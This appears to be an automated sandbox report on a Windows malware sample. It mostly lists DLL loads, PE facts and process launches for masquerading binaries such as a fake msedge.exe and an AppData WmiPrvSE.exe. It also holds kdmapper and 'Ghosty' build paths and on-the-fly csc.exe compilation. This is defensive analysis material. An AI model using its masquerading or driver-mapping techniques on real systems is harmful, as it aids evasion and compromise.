                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: version.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasapi32.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasman.dll
                                Source: C:\Edge\msedge.exeSection loaded: rtutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: mswsock.dll
                                Source: C:\Edge\msedge.exeSection loaded: winhttp.dll
                                Source: C:\Edge\msedge.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Edge\msedge.exeSection loaded: iphlpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Edge\msedge.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Edge\msedge.exeSection loaded: dnsapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: winnsi.dll
                                Source: C:\Edge\msedge.exeSection loaded: rasadhlp.dll
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dll
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dll
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dll
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dll
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dll
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dll
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dll
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dll
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dll
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dll
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dll
                                Source: C:\Edge\msedge.exeSection loaded: slc.dll
                                Source: C:\Edge\msedge.exeSection loaded: userenv.dll
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dll
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: seoI30IZZr.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: seoI30IZZr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: seoI30IZZr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000002.1501843564.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1495581926.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb source: seoI30IZZr.exe
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb66 source: seoI30IZZr.exe
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1507989582.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508229989.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508518215.000001B321131000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507989582.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.7.dr
                                Source: seoI30IZZr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: seoI30IZZr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: seoI30IZZr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: seoI30IZZr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: seoI30IZZr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"Jump to behavior
